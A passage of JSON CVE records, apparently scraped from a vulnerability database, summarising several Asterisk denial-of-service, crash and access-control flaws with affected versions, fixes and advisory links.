"url": "http://packetstormsecurity.com/files/166744/Asterisk-Project-Security-Advisory-AST-2022-001.html"
},
{
"name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"name": "DSA-5285",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/172139/Shannon-Baseband-chatroom-SDP-Attribute-Memory-Corruption.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "An issue was discovered in Asterisk through 19.x. When using STIR/SHAKEN, it is possible to download files that are not certificates. These files could be much larger than what one would expect to download, leading to Resource Exhaustion. This is fixed in 16.25.2, 18.11.2, and 19.3.2."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-05-04T00:00:00",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"url": "https://downloads.asterisk.org/pub/security/AST-2022-001.html"
},
{
"url": "http://packetstormsecurity.com/files/166744/Asterisk-Project-Security-Advisory-AST-2022-001.html"
},
{
"name": "[debian-lts-announce] 20221117 [SECURITY] [DLA 3194-1] asterisk security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00021.html"
},
{
"name": "DSA-5285",
"tags": [
"vendor-advisory"
],
"url": "https://www.debian.org/security/2022/dsa-5285"
},
{
"url": "http://packetstormsecurity.com/files/172139/Shannon-Baseband-chatroom-SDP-Attribute-Memory-Corruption.html"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2022-26498",
"datePublished": "2022-04-15T00:00:00",
"dateReserved": "2022-03-06T00:00:00",
"dateUpdated": "2024-08-03T05:03:32.984Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-32558 (GCVE-0-2021-32558)
Vulnerability from nvd – Published: 2021-07-27 05:19 – Updated: 2024-08-03 23:25
VLAI?
Summary
An issue was discovered in Sangoma Asterisk 13.x before 13.38.3, 16.x before 16.19.1, 17.x before 17.9.4, and 18.x before 18.5.1, and Certified Asterisk before 16.8-cert10. If the IAX2 channel driver receives a packet that contains an unsupported media format, a crash can occur.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T23:25:30.855Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "20210722 AST-2021-008: Remote crash when using IAX2 channel driver",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2021/Jul/49"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/163639/Asterisk-Project-Security-Advisory-AST-2021-008.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2021-008.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://issues.asterisk.org/jira/browse/ASTERISK-29392"
},
{
"name": "[debian-lts-announce] 20210804 [SECURITY] [DLA 2729-1] asterisk security update",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2021/08/msg00005.html"
},
{
"name": "DSA-4999",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN",
"x_transferred"
],
"url": "https://www.debian.org/security/2021/dsa-4999"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "An issue was discovered in Sangoma Asterisk 13.x before 13.38.3, 16.x before 16.19.1, 17.x before 17.9.4, and 18.x before 18.5.1, and Certified Asterisk before 16.8-cert10. If the IAX2 channel driver receives a packet that contains an unsupported media format, a crash can occur."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-11-02T10:06:13",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "20210722 AST-2021-008: Remote crash when using IAX2 channel driver",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2021/Jul/49"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/163639/Asterisk-Project-Security-Advisory-AST-2021-008.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2021-008.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://issues.asterisk.org/jira/browse/ASTERISK-29392"
},
{
"name": "[debian-lts-announce] 20210804 [SECURITY] [DLA 2729-1] asterisk security update",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.debian.org/debian-lts-announce/2021/08/msg00005.html"
},
{
"name": "DSA-4999",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN"
],
"url": "https://www.debian.org/security/2021/dsa-4999"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2021-32558",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "An issue was discovered in Sangoma Asterisk 13.x before 13.38.3, 16.x before 16.19.1, 17.x before 17.9.4, and 18.x before 18.5.1, and Certified Asterisk before 16.8-cert10. If the IAX2 channel driver receives a packet that contains an unsupported media format, a crash can occur."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "20210722 AST-2021-008: Remote crash when using IAX2 channel driver",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2021/Jul/49"
},
{
"name": "http://packetstormsecurity.com/files/163639/Asterisk-Project-Security-Advisory-AST-2021-008.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/163639/Asterisk-Project-Security-Advisory-AST-2021-008.html"
},
{
"name": "https://downloads.asterisk.org/pub/security/AST-2021-008.html",
"refsource": "MISC",
"url": "https://downloads.asterisk.org/pub/security/AST-2021-008.html"
},
{
"name": "https://issues.asterisk.org/jira/browse/ASTERISK-29392",
"refsource": "MISC",
"url": "https://issues.asterisk.org/jira/browse/ASTERISK-29392"
},
{
"name": "[debian-lts-announce] 20210804 [SECURITY] [DLA 2729-1] asterisk security update",
"refsource": "MLIST",
"url": "https://lists.debian.org/debian-lts-announce/2021/08/msg00005.html"
},
{
"name": "DSA-4999",
"refsource": "DEBIAN",
"url": "https://www.debian.org/security/2021/dsa-4999"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2021-32558",
"datePublished": "2021-07-27T05:19:34",
"dateReserved": "2021-05-11T00:00:00",
"dateUpdated": "2024-08-03T23:25:30.855Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-31878 (GCVE-0-2021-31878)
Vulnerability from nvd – Published: 2021-07-27 05:17 – Updated: 2024-08-03 23:10
VLAI?
Summary
An issue was discovered in PJSIP in Asterisk before 16.19.1 and before 18.5.1. To exploit, a re-INVITE without SDP must be received after Asterisk has sent a BYE request.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T23:10:30.837Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "20210722 AST-2021-007: Remote Crash Vulnerability in PJSIP channel driver",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2021/Jul/48"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/163638/Asterisk-Project-Security-Advisory-AST-2021-007.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://downloads.asterisk.org/pub/security/AST-2021-007.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://issues.asterisk.org/jira/browse/ASTERISK-29381"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://downloads.digium.com/pub/security/AST-2021-007.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "An issue was discovered in PJSIP in Asterisk before 16.19.1 and before 18.5.1. To exploit, a re-INVITE without SDP must be received after Asterisk has sent a BYE request."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-07-27T11:10:28",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "20210722 AST-2021-007: Remote Crash Vulnerability in PJSIP channel driver",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2021/Jul/48"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/163638/Asterisk-Project-Security-Advisory-AST-2021-007.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://downloads.asterisk.org/pub/security/AST-2021-007.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://issues.asterisk.org/jira/browse/ASTERISK-29381"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://downloads.digium.com/pub/security/AST-2021-007.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2021-31878",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "An issue was discovered in PJSIP in Asterisk before 16.19.1 and before 18.5.1. To exploit, a re-INVITE without SDP must be received after Asterisk has sent a BYE request."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "20210722 AST-2021-007: Remote Crash Vulnerability in PJSIP channel driver",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2021/Jul/48"
},
{
"name": "http://packetstormsecurity.com/files/163638/Asterisk-Project-Security-Advisory-AST-2021-007.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/163638/Asterisk-Project-Security-Advisory-AST-2021-007.html"
},
{
"name": "http://downloads.asterisk.org/pub/security/AST-2021-007.html",
"refsource": "MISC",
"url": "http://downloads.asterisk.org/pub/security/AST-2021-007.html"
},
{
"name": "https://issues.asterisk.org/jira/browse/ASTERISK-29381",
"refsource": "MISC",
"url": "https://issues.asterisk.org/jira/browse/ASTERISK-29381"
},
{
"name": "https://downloads.digium.com/pub/security/AST-2021-007.html",
"refsource": "MISC",
"url": "https://downloads.digium.com/pub/security/AST-2021-007.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2021-31878",
"datePublished": "2021-07-27T05:17:05",
"dateReserved": "2021-04-29T00:00:00",
"dateUpdated": "2024-08-03T23:10:30.837Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-26713 (GCVE-0-2021-26713)
Vulnerability from nvd – Published: 2021-02-19 19:30 – Updated: 2024-08-03 20:33
VLAI?
Summary
A stack-based buffer overflow in res_rtp_asterisk.c in Sangoma Asterisk before 16.16.1, 17.x before 17.9.2, and 18.x before 18.2.1 and Certified Asterisk before 16.8-cert6 allows an authenticated WebRTC client to cause an Asterisk crash by sending multiple hold/unhold requests in quick succession. This is caused by a signedness comparison mismatch.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T20:33:40.660Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2021-004.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://issues.asterisk.org/jira/browse/ASTERISK-29205"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "A stack-based buffer overflow in res_rtp_asterisk.c in Sangoma Asterisk before 16.16.1, 17.x before 17.9.2, and 18.x before 18.2.1 and Certified Asterisk before 16.8-cert6 allows an authenticated WebRTC client to cause an Asterisk crash by sending multiple hold/unhold requests in quick succession. This is caused by a signedness comparison mismatch."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-02-19T19:30:30",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2021-004.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://issues.asterisk.org/jira/browse/ASTERISK-29205"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2021-26713",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A stack-based buffer overflow in res_rtp_asterisk.c in Sangoma Asterisk before 16.16.1, 17.x before 17.9.2, and 18.x before 18.2.1 and Certified Asterisk before 16.8-cert6 allows an authenticated WebRTC client to cause an Asterisk crash by sending multiple hold/unhold requests in quick succession. This is caused by a signedness comparison mismatch."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://downloads.asterisk.org/pub/security/",
"refsource": "MISC",
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"name": "https://downloads.asterisk.org/pub/security/AST-2021-004.html",
"refsource": "MISC",
"url": "https://downloads.asterisk.org/pub/security/AST-2021-004.html"
},
{
"name": "https://issues.asterisk.org/jira/browse/ASTERISK-29205",
"refsource": "MISC",
"url": "https://issues.asterisk.org/jira/browse/ASTERISK-29205"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2021-26713",
"datePublished": "2021-02-19T19:30:30",
"dateReserved": "2021-02-05T00:00:00",
"dateUpdated": "2024-08-03T20:33:40.660Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-26712 (GCVE-0-2021-26712)
Vulnerability from nvd – Published: 2021-02-18 20:10 – Updated: 2024-08-03 20:33
VLAI?
Summary
Incorrect access controls in res_srtp.c in Sangoma Asterisk 13.38.1, 16.16.0, 17.9.1, and 18.2.0 and Certified Asterisk 16.8-cert5 allow a remote unauthenticated attacker to prematurely terminate secure calls by replaying SRTP packets.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T20:33:40.803Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"name": "20210218 AST-2021-003: Remote attacker could prematurely tear down SRTP calls",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2021/Feb/59"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2021-003.html"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://issues.asterisk.org/jira/browse/ASTERISK-29260"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/161473/Asterisk-Project-Security-Advisory-AST-2021-003.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Incorrect access controls in res_srtp.c in Sangoma Asterisk 13.38.1, 16.16.0, 17.9.1, and 18.2.0 and Certified Asterisk 16.8-cert5 allow a remote unauthenticated attacker to prematurely terminate secure calls by replaying SRTP packets."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-02-19T15:06:09",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"name": "20210218 AST-2021-003: Remote attacker could prematurely tear down SRTP calls",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2021/Feb/59"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2021-003.html"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://issues.asterisk.org/jira/browse/ASTERISK-29260"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/161473/Asterisk-Project-Security-Advisory-AST-2021-003.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2021-26712",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Incorrect access controls in res_srtp.c in Sangoma Asterisk 13.38.1, 16.16.0, 17.9.1, and 18.2.0 and Certified Asterisk 16.8-cert5 allow a remote unauthenticated attacker to prematurely terminate secure calls by replaying SRTP packets."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://downloads.asterisk.org/pub/security/",
"refsource": "MISC",
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"name": "20210218 AST-2021-003: Remote attacker could prematurely tear down SRTP calls",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2021/Feb/59"
},
{
"name": "https://downloads.asterisk.org/pub/security/AST-2021-003.html",
"refsource": "CONFIRM",
"url": "https://downloads.asterisk.org/pub/security/AST-2021-003.html"
},
{
"name": "https://issues.asterisk.org/jira/browse/ASTERISK-29260",
"refsource": "CONFIRM",
"url": "https://issues.asterisk.org/jira/browse/ASTERISK-29260"
},
{
"name": "http://packetstormsecurity.com/files/161473/Asterisk-Project-Security-Advisory-AST-2021-003.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/161473/Asterisk-Project-Security-Advisory-AST-2021-003.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2021-26712",
"datePublished": "2021-02-18T20:10:20",
"dateReserved": "2021-02-05T00:00:00",
"dateUpdated": "2024-08-03T20:33:40.803Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-26906 (GCVE-0-2021-26906)
Vulnerability from nvd – Published: 2021-02-18 19:50 – Updated: 2024-08-03 20:33
VLAI?
Summary
An issue was discovered in res_pjsip_session.c in Digium Asterisk through 13.38.1; 14.x, 15.x, and 16.x through 16.16.0; 17.x through 17.9.1; and 18.x through 18.2.0, and Certified Asterisk through 16.8-cert5. An SDP negotiation vulnerability in PJSIP allows a remote server to potentially crash Asterisk by sending specific SIP responses that cause an SDP negotiation failure.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T20:33:41.368Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"name": "20210218 AST-2021-005: Remote Crash Vulnerability in PJSIP channel driver",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2021/Feb/61"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2021-005.html"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://issues.asterisk.org/jira/browse/ASTERISK-29196"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/161477/Asterisk-Project-Security-Advisory-AST-2021-005.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "An issue was discovered in res_pjsip_session.c in Digium Asterisk through 13.38.1; 14.x, 15.x, and 16.x through 16.16.0; 17.x through 17.9.1; and 18.x through 18.2.0, and Certified Asterisk through 16.8-cert5. An SDP negotiation vulnerability in PJSIP allows a remote server to potentially crash Asterisk by sending specific SIP responses that cause an SDP negotiation failure."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-02-19T15:06:10",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"name": "20210218 AST-2021-005: Remote Crash Vulnerability in PJSIP channel driver",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2021/Feb/61"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://downloads.asterisk.org/pub/security/AST-2021-005.html"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://issues.asterisk.org/jira/browse/ASTERISK-29196"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/161477/Asterisk-Project-Security-Advisory-AST-2021-005.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2021-26906",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "An issue was discovered in res_pjsip_session.c in Digium Asterisk through 13.38.1; 14.x, 15.x, and 16.x through 16.16.0; 17.x through 17.9.1; and 18.x through 18.2.0, and Certified Asterisk through 16.8-cert5. An SDP negotiation vulnerability in PJSIP allows a remote server to potentially crash Asterisk by sending specific SIP responses that cause an SDP negotiation failure."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://downloads.asterisk.org/pub/security/",
"refsource": "MISC",
"url": "https://downloads.asterisk.org/pub/security/"
},
{
"name": "20210218 AST-2021-005: Remote Crash Vulnerability in PJSIP channel driver",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2021/Feb/61"
},
{
"name": "https://downloads.asterisk.org/pub/security/AST-2021-005.html",
"refsource": "CONFIRM",
"url": "https://downloads.asterisk.org/pub/security/AST-2021-005.html"
},
{
"name": "https://issues.asterisk.org/jira/browse/ASTERISK-29196",
"refsource": "CONFIRM",
"url": "https://issues.asterisk.org/jira/browse/ASTERISK-29196"
},
{
"name": "http://packetstormsecurity.com/files/161477/Asterisk-Project-Security-Advisory-AST-2021-005.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/161477/Asterisk-Project-Security-Advisory-AST-2021-005.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2021-26906",
"datePublished": "2021-02-18T19:50:04",
"dateReserved": "2021-02-08T00:00:00",
"dateUpdated": "2024-08-03T20:33:41.368Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-49786 (GCVE-0-2023-49786)
Vulnerability from cvelistv5 – Published: 2023-12-14 19:47 – Updated: 2025-02-13 17:18
VLAI?
Title
Asterisk susceptible to Denial of Service via DTLS Hello packets during call initiation
Summary
Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1; as well as certified-asterisk prior to 18.9-cert6; Asterisk is susceptible to a DoS due to a race condition in the hello handshake phase of the DTLS protocol when handling DTLS-SRTP for media setup. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP. Commit d7d7764cb07c8a1872804321302ef93bf62cba05 contains a fix, which is part of versions 18.20.1, 20.5.1, 21.0.1, amd 18.9-cert6.
Severity ?
7.5 (High)
CWE
- CWE-703 - Improper Check or Handling of Exceptional Conditions
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T22:01:25.997Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "https://github.com/asterisk/asterisk/security/advisories/GHSA-hxj9-xwr8-w8pq",
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-hxj9-xwr8-w8pq"
},
{
"name": "https://github.com/asterisk/asterisk/commit/d7d7764cb07c8a1872804321302ef93bf62cba05",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/asterisk/asterisk/commit/d7d7764cb07c8a1872804321302ef93bf62cba05"
},
{
"name": "https://github.com/EnableSecurity/advisories/tree/master/ES2023-01-asterisk-dtls-hello-race",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/EnableSecurity/advisories/tree/master/ES2023-01-asterisk-dtls-hello-race"
},
{
"tags": [
"x_transferred"
],
